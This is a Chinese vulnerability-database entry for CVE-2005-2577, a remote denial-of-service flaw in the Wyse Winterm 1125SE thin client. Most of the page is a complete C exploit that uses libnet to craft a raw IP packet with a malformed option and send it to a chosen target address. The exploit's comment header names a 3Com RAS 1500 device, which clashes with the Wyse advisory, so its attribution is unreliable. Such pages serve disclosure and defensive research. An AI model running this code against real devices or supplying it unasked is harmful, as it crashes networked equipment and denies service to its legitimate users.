Wyse Winterm 1125SE 远程拒绝服务漏洞

Wyse Winterm 1125SE 远程拒绝服务漏洞

漏洞ID 1108982 漏洞类型 其他
发布时间 2005-08-10 更新时间 2005-10-20
图片[1]-Wyse Winterm 1125SE 远程拒绝服务漏洞-安全小百科CVE编号 CVE-2005-2577
图片[2]-Wyse Winterm 1125SE 远程拒绝服务漏洞-安全小百科CNNVD-ID CNNVD-200508-145
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/26145
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-145
|漏洞详情
WyseWinterm1125SE运行固件4.2.09f或4.4.061f允许远程攻击者借助于其IP项长度字段为零的数据包造成拒绝服务(设备崩溃)。
|漏洞EXP
source: http://www.securityfocus.com/bid/14536/info

Winterm 1125SE is affected by a remote denial of service vulnerability. This issue is due to the application failing to handle exceptional conditions in a proper manner.

The problem occurs when processing packets with malformed IP headers. A successful attack causes the application to crash, denying service to legitimate users. 

/*
 * 3com superstack II RAS 1500 remote Denial of Service
 *
 * Piotr Chytla <[email protected]>
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
 * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
 *
 * (c) 2003 Copyright by iSEC Security Research
 */

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <libnet.h>
#define OPT_LEN 4
void usage()
{
  printf("Args: n");
  printf("-s [source address]n");
  printf("-d [destination address]n");
}

int main(int argc,char *argv[])
{
 char a;
 int sock,r;
 u_long src;
 u_long dst;
 char pktbuf[IP_MAXPACKET];
 char payload[]="ABCDEFGHIJKLMNOPRST";
 u_char options[4];
 struct ipoption ipopt;
 bzero(options,OPT_LEN);
 while((a=getopt(argc,argv,"d:s:h?"))!=EOF)
 {
     switch(a) {
         case 'h' : { usage(); exit(1); }
         case 's' : { src=libnet_name_resolve(optarg,0); break;}
         case 'd' : { dst=libnet_name_resolve(optarg,0); break;}
        }
 }
 sock = libnet_open_raw_sock(IPPROTO_RAW);
 if (sock<0)
 {
 perror("socket");
 exit(1);
 }

 libnet_build_ip(strlen(payload),0,0x1337,0,255,0xaa,src,dst,payload,strlen(payload),pktbuf);
  memcpy(ipopt.ipopt_list, options, OPT_LEN);
  *(ipopt.ipopt_list)     = 0xe4;
  *(ipopt.ipopt_list+1)   = 0;
  *(ipopt.ipopt_list+1)   = 0;
  *(ipopt.ipopt_list+1)   = 0;
  r=libnet_insert_ipo(&ipopt,OPT_LEN,pktbuf);
  if (r <0)
   {
        libnet_close_raw_sock(sock);
        printf("Error ip options insertion failedn");
        exit(1);
   }
  r=libnet_write_ip(sock,pktbuf,LIBNET_IP_H+OPT_LEN+strlen(payload));
  if (r<0)
  {
   libnet_close_raw_sock(sock);
   printf("Error write_ip n");
   exit(1);
  }
 libnet_close_raw_sock(sock);
 return 0;
}
|参考资料

来源:SECTRACK
名称:1014659
链接:http://securitytracker.com/id?1014659
来源:BID
名称:14536
链接:http://www.securityfocus.com/bid/14536
来源:SECUNIA
名称:16409
链接:http://secunia.com/advisories/16409
来源:BUGTRAQ
名称:20050810remoteDOSonWysethinclient1125SE
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112379283900586&w;=2

相关推荐: Advanced Guestbook 2.2/2.3 – User-Agent HTML Injection

Advanced Guestbook 2.2/2.3 – User-Agent HTML Injection 漏洞ID 1054866 漏洞类型 发布时间 2005-01-22 更新时间 2005-01-22 CVE编号 N/A CNNVD-ID N/A 漏洞…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享